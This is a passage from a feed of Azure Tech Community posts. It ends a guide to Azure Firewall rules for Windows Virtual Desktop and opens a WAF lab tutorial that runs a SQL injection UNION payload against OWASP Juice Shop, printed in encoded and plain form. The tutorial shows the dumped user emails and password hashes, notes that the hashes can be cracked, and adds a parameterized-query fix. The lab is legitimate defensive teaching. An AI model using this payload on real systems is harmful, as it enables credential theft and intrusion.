},</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>“sourceAddresses”: [ xx.xx.xx.xx/yy ] is the network CIDR range of the subnet where your Azure Virtual Desktop host pools are located.</EM></P> <P>&nbsp;</P> <P>This rule will allow HTTPS traffic from the Windows Virtual Desktop host pool VMs to communicate with the management plane of WVD via the Tag.</P> <P>&nbsp;</P> <P>You also need to add some additional rules to the rule collection set; these allow the Windows Virtual Desktop host pool VMs to communicate with the data plane of WVD.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture17.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255971i04F3DBC3BF24C9A2/image-size/large?v=v2&amp;px=999" role="button" title="Picture17.png" alt="Picture17.png" /></span></P> <P>&nbsp;</P> <P>According to the documentation, the data plane of the WVD can be unique per instance. The first example may be a bit too wide open for your security posture and risk. 
To have more restrictive rules that are granular enough to allow only specific access to the data plane of WVD, the documentation provides you with a KQL query you can run against the Azure Firewall’s diagnostic logs.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="yaml">AzureDiagnostics
| where Category == "AzureFirewallApplicationRule"
| search "Deny"
| search "gsm*eh.servicebus.windows.net" or "gsm*xt.blob.core.windows.net" or "gsm*xt.table.core.windows.net" or "gsm*xt.queue.core.windows.net"
| parse msg_s with Protocol " request from " SourceIP ":" SourcePort:int " to " FQDN ":" *
| project TimeGenerated,Protocol,FQDN</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Another way to find these specific FQDNs of the WVD data layer is on the Host Pool VMs themselves, in the Event Viewer. Many thanks to Eric Moore who discovered this technique. This can be useful if you are putting an Azure Firewall into an existing WVD host pool and want to prevent interruption.</P> <P>&nbsp;</P> <P>On the WVD Host Pool VM, open <STRONG>Event Viewer,</STRONG> go to <STRONG>Windows Logs</STRONG> and <STRONG>Application</STRONG></P> <P>&nbsp;</P> <P>Filter on<STRONG> Source: WVD-Agent </STRONG>and<STRONG> Event ID: 3701</STRONG></P> <P>&nbsp;</P> <P><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture18.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255972i25D65FFC66564D1F/image-size/large?v=v2&amp;px=999" role="button" title="Picture18.png" alt="Picture18.png" /></span></STRONG></P> <P>&nbsp;</P> <P>Scroll through the events until you come across one that exposes a larger list of more than 4 FQDNs.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture19.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255973iF880FF641F8167BE/image-size/large?v=v2&amp;px=999" role="button" 
title="Picture19.png" alt="Picture19.png" /></span></P> <P>&nbsp;</P> <P>Now that you have obtained the FQDNs unique to your WVD instances, you can create additional Application Rules to allow the Windows Virtual Desktop host pools to communicate on the data access layer. The WVD data access layer consists of unique Azure Service Bus namespaces and Storage Account blobs, tables, and queues.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{
  "ruleType": "ApplicationRule",
  "name": "AllowWVDServicebus",
  "protocols": [
    { "protocolType": "Https", "port": 443 }
  ],
  "targetUrls": [
    "gsm1860291218eh.servicebus.windows.net/*",
    "gsm1402610616eh.servicebus.windows.net/*",
    "gsm2121010078eh.servicebus.windows.net/*",
    "gsm2076831083eh.servicebus.windows.net/*"
  ],
  "sourceAddresses": [ "XX.XX.XX.XX/YY" ],
  "terminateTLS": true
},
{
  "ruleType": "ApplicationRule",
  "name": "AllowWVDBlob",
  "protocols": [
    { "protocolType": "Https", "port": 443 }
  ],
  "targetUrls": [
    "gsm1860291218xt.blob.core.windows.net/*",
    "gsm1402610616xt.blob.core.windows.net/*",
    "gsm2121010078xt.blob.core.windows.net/*",
    "gsm2076831083xt.blob.core.windows.net/*"
  ],
  "sourceAddresses": [ "XX.XX.XX.XX/YY" ],
  "terminateTLS": true
},
{
  "ruleType": "ApplicationRule",
  "name": "AllowWVDTable",
  "protocols": [
    { "protocolType": "Https", "port": 443 }
  ],
  "targetUrls": [
    "gsm1860291218xt.table.core.windows.net/*",
    "gsm1402610616xt.table.core.windows.net/*",
    "gsm2121010078xt.table.core.windows.net/*",
    "gsm2076831083xt.table.core.windows.net/*"
  ],
  "sourceAddresses": [ "XX.XX.XX.XX/YY" ],
  "terminateTLS": true
},
{
  "ruleType": "ApplicationRule",
  "name": "AllowWVDQueue",
  "protocols": [
    { "protocolType": "Https", "port": 443 }
  ],
  "targetUrls": [
    "gsm1860291218xt.queue.core.windows.net/*",
    "gsm1402610616xt.queue.core.windows.net/*",
    "gsm2121010078xt.queue.core.windows.net/*",
    "gsm2076831083xt.queue.core.windows.net/*"
  ],
  "sourceAddresses": [ "XX.XX.XX.XX/YY" ],
  "terminateTLS": true
},</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>“sourceAddresses”: [ xx.xx.xx.xx/yy ] is 
the network CIDR range of the subnet where your Azure Virtual Desktop host pools are located.</EM></P> <P>&nbsp;</P> <P>This rule will allow HTTPS traffic from the Windows Virtual Desktop host pool VMs to communicate with the unique data plane of WVD.</P> <P>&nbsp;</P> <P>Be sure to <A href="#" target="_blank" rel="noopener">review configuring your Azure Firewall policies</A> to use KeyVault and certificates to do TLS inspection; this will allow the use of the URL / within the application rules.</P> <P>&nbsp;</P> <P>The rules above are reflected in the Azure Portal within the Firewall Policy under Application Rules.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture20.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255974i6025D225B0C4AA20/image-size/large?v=v2&amp;px=999" role="button" title="Picture20.png" alt="Picture20.png" /></span></P> <P>&nbsp;</P> <P>You will now create a new rule collection set for the Network based rules to allow certain traffic from the Windows Virtual Desktop host pools.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "name": "AllowAdditionalWVDNetwork", "priority": 103, "ruleCollectionType": "FirewallPolicyFilterRuleCollection", "action": { "type": "Allow" }, "rules": [...] 
}</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Azure documentation states the following for Network based rules</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture21.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255975i8FCA6C1EAD368E9F/image-size/large?v=v2&amp;px=999" role="button" title="Picture21.png" alt="Picture21.png" /></span></P> <P>&nbsp;</P> <P>Those rules will look like the following in code between the rule collection code “rules”: […]</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "NetworkRule", "name": "AllowADDNS", "ipProtocols": [ "TCP", "UDP" ], "sourceAddresses": [ "XX.XX.XX.XX/YY" ], "destinationAddresses": [ "ZZ.ZZ.ZZ.ZZ" ], "sourceIpGroups": [], "destinationIpGroups": [], "destinationFqdns": [], "destinationPorts": [ "53" ] },</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>“sourceAddress”: [ xx.xx.xx.xx/yy ] is the Network CIDR range of the subnet where your Azure Virtual Desktop host pools are located in.</EM></P> <P>&nbsp;</P> <P>This first network rule in the ruleset Allows the WVD Host Pools to communicate TCP 53 with Local AD DNS servers. ZZ.ZZ.ZZ.ZZ is the AD DNS Server(s). Note if you are restrictive in the communication between Host Pool and Active Directory Domain Services subnet, you may want to also open additional ports <A href="#" target="_blank" rel="noopener">outlined here</A> for Active Directory.</P> <P>&nbsp;</P> <P>An example of the next rule is below</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "NetworkRule", "name": "AllowAzureKMS", "ipProtocols": [ "TCP" ], "sourceAddresses": [ "XX.XX.XX.XX/YY" ], "destinationAddresses": [], "sourceIpGroups": [], "destinationIpGroups": [], "destinationFqdns": [ "kms.core.windows.net" ], "destinationPorts": [ "1688" ] },</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>The second network rule is allowing the WVD Host Pools to communicate with the Azure KMS service. 
What is interesting here is the use of a FQDN in a Network Rule rather than an IP address for destination. A couple months back Azure Firewall introduced this capability which allows the <A href="#" target="_blank" rel="noopener">Azure Firewall to Leverage Azure DNS or a Custom DNS</A> to look up answers for the network rule. This can simplify a lot of rules now, since many Azure services, Microsoft services, or 3<SUP>rd</SUP> party cloud services have a FQDN service whose IP addresses can change from time to time.</P> <P>&nbsp;</P> <P>If you are using a Network rule like this with FQDN, please take note that you need to update the Azure Firewall to utilize FQDNs in network rules; the <A href="#" target="_blank" rel="noopener">following article goes into more detail</A>.</P> <P>&nbsp;</P> <P>The ARM template and Infrastructure as code looks like this under the resource Microsoft.Network/firewallPolicies</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">"properties": { "threatIntelMode": "Alert", "dnsSettings": { "servers": [] }, "transportSecurity": { "certificateAuthority": { "name": "cacert" } } }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>In the Azure portal, you will find the equivalent configuration in the Azure Firewall policy under Setting &gt; DNS.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture22.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255976i41A45CE2B398F9B3/image-size/large?v=v2&amp;px=999" role="button" title="Picture22.png" alt="Picture22.png" /></span></P> <P>&nbsp;</P> <P>A final network rule will allow the WVD host pool to communicate with NTP servers using the FQDN as a destination.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "NetworkRule", "name": "AllowWindowsNTP", "ipProtocols": [ "UDP" ], "sourceAddresses": [ "*" ], "destinationAddresses": [], "sourceIpGroups": [], "destinationIpGroups": [], 
"destinationFqdns": [ "time.windows.com" ], "destinationPorts": [ "123" ] }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>The rules above are reflected in the Azure Portal within the Firewall Policy under Network Rules</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture23.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255977i811002707134F808/image-size/large?v=v2&amp;px=999" role="button" title="Picture23.png" alt="Picture23.png" /></span></P> <P>&nbsp;</P> <P>All of the rule collections and application and network rules discussed here can also be found on Azure Network Security GitHub repo as a <A href="#" target="_blank" rel="noopener">deployable Azure Fw Policy</A>. There will be continuing improvement on the WVD Azure Firewall Policy sample to include the Active Directory, Azure NetApp, and Office 365 Allow Rules. For now the deployable sample will include the items discussed in the Azure documentation.</P> <P>&nbsp;</P> <P>In this post you learned how to use the new features of Azure Firewall premium with Windows Virtual Desktop. Features like IDPS and Web Categories which enhance your security posture for Windows Virtual Desktop. 
You also learned some examples of Application and Network rules for Windows Virtual Desktop.</P> <P>&nbsp;</P> <P>Be sure to check out other examples at <A href="#" target="_blank" rel="noopener">Azure Network Security GitHub</A> and if interested please upload your Azure Firewall Sample patterns here as well via a pull request.</P> <P>&nbsp;</P> <P><STRONG>Special thanks to:</STRONG></P> <P><STRONG>@</STRONG><EM>Nyler Gaskins for GitHub assets and testing and reviewing this post</EM></P> <P><EM><LI-USER uid="356371"></LI-USER> Kapila for testing and reviewing the post</EM></P> <P><EM><LI-USER uid="69313"></LI-USER> for how to find the WVD data plane communication technique</EM></P> Tue, 27 Apr 2021 15:39:52 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/how-to-use-azure-firewall-premium-with-wvd/ba-p/2148402 Nathan Swift 2021-04-27T15:39:52Z Part 4 - Data Disclosure and Exfiltration Playbook: Azure WAF Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-4-data-disclosure-and-exfiltration-playbook-azure-waf/ba-p/2031269 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Tutorial: Data Disclosure and Exfiltration Playbook</FONT></H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The last tutorial in this four-part series for Azure WAF protection is the data exfiltration playbook.&nbsp; The purpose of the Azure WAF security protection lab is to demonstrate <STRONG>Azure WAF</STRONG>'s capabilities in identifying and protecting against suspicious activities and potential attacks against your web applications.&nbsp; This playbook explains how to test Azure WAF's protections against a <STRONG>SQL Injection (SQLi)</STRONG> <STRONG>attack</STRONG> with emphasis on Azure WAF protection ruleset and logging capabilities.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are 
broader than the use cases demonstrated herein.</P> <P>&nbsp;</P> <P>This playbook demonstrates the protection capabilities of Azure WAF against a simulated SQL Injection attack from common, real-world, publicly available hacking and attack tools.</P> <P>&nbsp;</P> <P>In this tutorial you will:</P> <OL> <LI>Simulate SQL Injection (SQLi) attack against the target OWASP Juice Shop application directly and then attack the same instance of the web application published through Azure WAF</LI> <LI>Observe the difference in the web application behavior in the two scenarios</LI> <LI>Review the summarized logs in the WAF Workbook (<A href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A>)</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Prerequisites</H2> <P>&nbsp;</P> <OL> <LI><A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">A completed Azure WAF security lab setup</A><BR /> <UL> <LI>We recommend following the lab setup instructions as closely as possible. 
The closer your lab is to the suggested lab setup, the easier it will be to follow the Azure ATP testing procedures.</LI> </UL> </LI> <LI><A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Completion of the reconnaissance playbook tutorial</A></LI> <LI><A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Completion of the vulnerability exploitation playbook tutorial</A></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Configuring Burp Suite and Firefox</H3> <P>&nbsp;</P> <P>Before you begin, please refer to the <STRONG>Configuring Burp Suite and Firefox</STRONG> section in the previous tutorial, <A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A>&nbsp;to set up Burp Suite and the Firefox web browser on the Kali VM.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Sensitive Data Exposure and Exfiltration</H2> <P>&nbsp;</P> <P>In this phase, the attacker is ready to use a vulnerability they have previously discovered, tested, and developed further to achieve their objective to access and exfiltrate data.&nbsp; In this playbook, we will perform a SQL Injection attack to disclose and then exfiltrate the list of all user credentials in the OWASP Juice Shop application.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Performing SQL Injection against the Target Web Application</H2> <P>&nbsp;</P> <P>In this tutorial, you will perform a SQL Injection (SQLi) attack against the OWASP Juice Shop application two times.&nbsp;</P> <P>&nbsp;</P> <OL> 
<LI><STRONG>Scenario 1</STRONG>: Performing SQL injection in the target web application directly</LI> <LI><STRONG>Scenario 2</STRONG>: Performing the same injection in the same target web application protected by Azure WAF on Application Gateway</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Scenario 1:&nbsp; Performing SQL Injection when going to the OWASP Juice Shop Application directly</H3> <P>&nbsp;</P> <OL> <LI>Sign into the Kali VM using your lab credentials</LI> <LI>Launch Burp Suite and ensure you have Burp Suite configured and running as described in the <STRONG>Configuring Burp Suite and Firefox </STRONG>section of the <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A></LI> <LI>Using Firefox, browse directly to the Juice Shop site by going to <SPAN>http://owaspdirect-&lt;deployment</SPAN> guid&gt;.azurewebsites.net</LI> <LI>In Burp Suite, check the <STRONG>Proxy --&gt; HTTP history</STRONG> tab for the request and response data for this website</LI> <LI>In the search bar on the Juice Shop website, type "apple" and examine the request and response in Burp Suite</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609802434105.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244123i7FFCB7BEA0286BE3/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609802434105.png" alt="Mohit_Kumar_0-1609802434105.png" /></span></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT</STRONG>: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF 
Attack Testing Lab Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only.&nbsp; The URL for the application will be <SPAN>http://owaspdirect-&lt;deployment</SPAN> guid&gt;.azurewebsites.net.&nbsp; &lt;deployment guid&gt; is unique to every deployment</FONT></P> <P>&nbsp;</P> <OL start="6"> <LI>We see that when searching, the client makes a connection to the <STRONG>/rest/products/search</STRONG> endpoint</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609802546363.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244124iA2B4AC4796C9A28E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609802546363.png" alt="Mohit_Kumar_1-1609802546363.png" /></span></P> <P>&nbsp;</P> <OL start="7"> <LI>The&nbsp;<STRONG>/rest/products/search&nbsp;</STRONG>endpoint&nbsp;of the&nbsp;<STRONG>OWASP Juice Shop</STRONG>&nbsp;application is vulnerable to SQL injection.&nbsp; In this tutorial, we will be exploiting the SQLi vulnerability in this endpoint</LI> <LI>To exploit the SQLi vulnerability in the <STRONG>/rest/products/search </STRONG>endpoint, we will use Burp Suite's Repeater functionality to inject a specifically crafted SQL query in the request to this endpoint</LI> <LI>To do this, right click one of the GET requests to the <STRONG>/rest/products/search </STRONG>endpoint and then click <STRONG>Send to Repeater</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 1 - Send Request to Burp Repeater</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609804509315.png" style="width: 999px;"><img 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244136i736F2AA445C15334/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609804509315.png" alt="Mohit_Kumar_0-1609804509315.png" /></span></STRONG></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 - Request in Burp Repeater</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609804517809.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244137i8573A7C582B8D505/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609804517809.png" alt="Mohit_Kumar_1-1609804517809.png" /></span></STRONG></P> <P>&nbsp;</P> <OL start="10"> <LI>When ready to perform the injection, we will copy/paste and append the following encoded SQL query to the Request URI <STRONG>/rest/products/search?q=</STRONG> (as value to the query parameter) in the Burp Repeater window</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. URL encoded SQL query</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">%71%77%65%72%74%27%29%29%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%69%64%2c%20%65%6d%61%69%6c%2c%20%70%61%73%73%77%6f%72%64%2c%20%27%34%27%2c%20%27%35%27%2c%20%27%36%27%2c%20%27%37%27%2c%20%27%38%27%2c%20%27%39%27%20%46%52%4f%4d%20%55%73%65%72%73%2d%2d </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">b. 
Plain text SQL query (for reference)</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">qwert')) UNION SELECT id, email, password, '4', '5', '6', '7', '8', '9' FROM Users-- </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip:&nbsp;</STRONG>You can also append the plain text SQL query to the request URI, but it may fail in certain conditions</FONT></LI> </UL> <P>&nbsp;</P> <OL start="11"> <LI>After appending the encoded query to the request URI, as the value of the query parameter, click&nbsp;<STRONG>Go</STRONG>&nbsp;<STRONG>(or Send button)</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609804755202.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244141iDFE5B6932BE2661E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609804755202.png" alt="Mohit_Kumar_0-1609804755202.png" /></span></P> <P>&nbsp;</P> <OL start="12"> <LI>You should see a successful response from the OWASP Juice Shop application with details of all the users and their credentials disclosed by the web application.&nbsp; This indicates that our SQL injection attack was successful</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609804823459.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244143i31E0738E78D9C392/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609804823459.png" alt="Mohit_Kumar_2-1609804823459.png" /></span></P> <P>&nbsp;</P> <H5>JSON data in the response body</H5> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE 
lang="json">{"status":"success","data":[{"id":1,"name":"admin@juice-sh.op","description":"0192023a7bbd73250516f069df18b500","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":2,"name":"jim@juice-sh.op","description":"e541ca7ecf72b8d1286474fc613e5e45","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":3,"name":"bender@juice-sh.op","description":"0c36e517e3fa95aabf1bbffc6744a4ef","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":4,"name":"bjoern.kimminich@gmail.com","description":"6edd9d726cbdc873c539e41ae8757b8c","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":5,"name":"ciso@juice-sh.op","description":"861917d5fa5f1172f931dc700d81a8fb","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":6,"name":"support@juice-sh.op","description":"d57386e76107100a7d6c2782978b2e7b","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":7,"name":"morty@juice-sh.op","description":"f2f933d0bb0ba057bc8e33b8ebd6d9e8","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":8,"name":"mc.safesearch@juice-sh.op","description":"b03f4b0ba8b458fa0acdc02cdb953bc8","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":9,"name":"J12934@juice-sh.op","description":"3c2abc04e4a6ea8f1327d0aae3714b7d","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":10,"name":"wurstbrot@juice-sh.op","description":"9ad5b0492bbe528583e128d2a8941de4","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":11,"name":"amy@juice-sh.op","description":"030f05e45e30710c3ad3c32f00de0473","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":12,"nam
e":"bjoern@juice-sh.op","description":"7f311911af16fa8f418dd1a3051d6810","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":13,"name":"bjoern@owasp.org","description":"9283f1b2e9669749081963be0462e466","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":14,"name":"chris.pike@juice-sh.op","description":"10a783b9ed19ea1c67c3a27699f0095b","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":15,"name":"accountant@juice-sh.op","description":"963e10f92a70b4b463220cb4c5d636dc","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":16,"name":"uvogin@juice-sh.op","description":"05f92148b4b60f7dacd04cceebb8f1af","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":17,"name":"demo","description":"fe01ce2a7fbac8fafaed7c982a04e229","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":18,"name":"john@juice-sh.op","description":"00479e957b6b42c459ee5746478e4d45","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},{"id":19,"name":"emma@juice-sh.op","description":"402f1c4a75e316afec5a6ea63147f739","price":"4","deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"}]}</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>: &nbsp;Data in the "Description" field in the server response is the password hash of the users which can be reversed using free tools available on the internet</FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Scenario 2:&nbsp; Performing SQL Injection when going to the OWASP Juice Shop Application through Azure WAF</H3> <P>&nbsp;</P> <P>You will now attempt to perform SQL Injection with the same query when going to the OWASP Juice Shop site through Azure WAF.</P> <P>&nbsp;</P> <OL> 
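</OL> <P>Why the Scenario 1 response carries e-mail addresses under "name" and password hashes under "description", and why binding the search term as a parameter stops it. This is an added example, not code from the original post or from OWASP Juice Shop: the query shape is an assumption inferred from the payload's <STRONG>'))</STRONG> prefix and the nine fields in the response, and the tables and rows are constructed.</P>

```python
import sqlite3

# Plain-text payload from step 10b of the tutorial (what the server sees
# after URL decoding).
PAYLOAD = ("qwert')) UNION SELECT id, email, password, "
           "'4', '5', '6', '7', '8', '9' FROM Users--")


def make_db():
    """Constructed stand-in database: nine product columns, named after the
    nine keys in the tutorial's JSON response."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.executescript("""
        CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT,
            description TEXT, price TEXT, deluxePrice TEXT, image TEXT,
            createdAt TEXT, updatedAt TEXT, deletedAt TEXT);
        CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT);
        INSERT INTO Products VALUES (1, 'Apple Juice', 'The all-time classic.',
            '1.99', '0.99', 'apple_juice.jpg', '2021-01-01', '2021-01-01', NULL);
        INSERT INTO Users VALUES (1, 'alice@example.test', 'constructed-hash-1');
        INSERT INTO Users VALUES (2, 'bob@example.test', 'constructed-hash-2');
    """)
    return db


def search_vulnerable(db, q):
    # Assumed query shape. The search term is concatenated into the SQL text,
    # so a quote in q ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT * FROM Products WHERE ((name LIKE '%" + q + "%' "
           "OR description LIKE '%" + q + "%') AND deletedAt IS NULL) "
           "ORDER BY name")
    return [dict(row) for row in db.execute(sql)]


def search_parameterized(db, q):
    # Same statement, but q is a bound value: the SQL text is fixed before
    # the input is seen, so the input can only ever be compared, not executed.
    pattern = "%" + q + "%"
    sql = ("SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    return [dict(row) for row in db.execute(sql, (pattern, pattern))]


if __name__ == "__main__":
    db = make_db()
    print("normal search      :", search_vulnerable(db, "apple"))
    # The UNION needs nine columns to line up with Products, which is why the
    # payload pads with '4'..'9'. Result columns keep the Products names, so
    # email lands in "name" and password in "description".
    for row in search_vulnerable(db, PAYLOAD):
        print("concatenated query :", row)
    print("parameterized query:", search_parameterized(db, PAYLOAD))
```

<P>The WAF block in Scenario 2 leaves the concatenated query in place; the parameterized form removes the flaw in the application itself.</P> <OL> 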
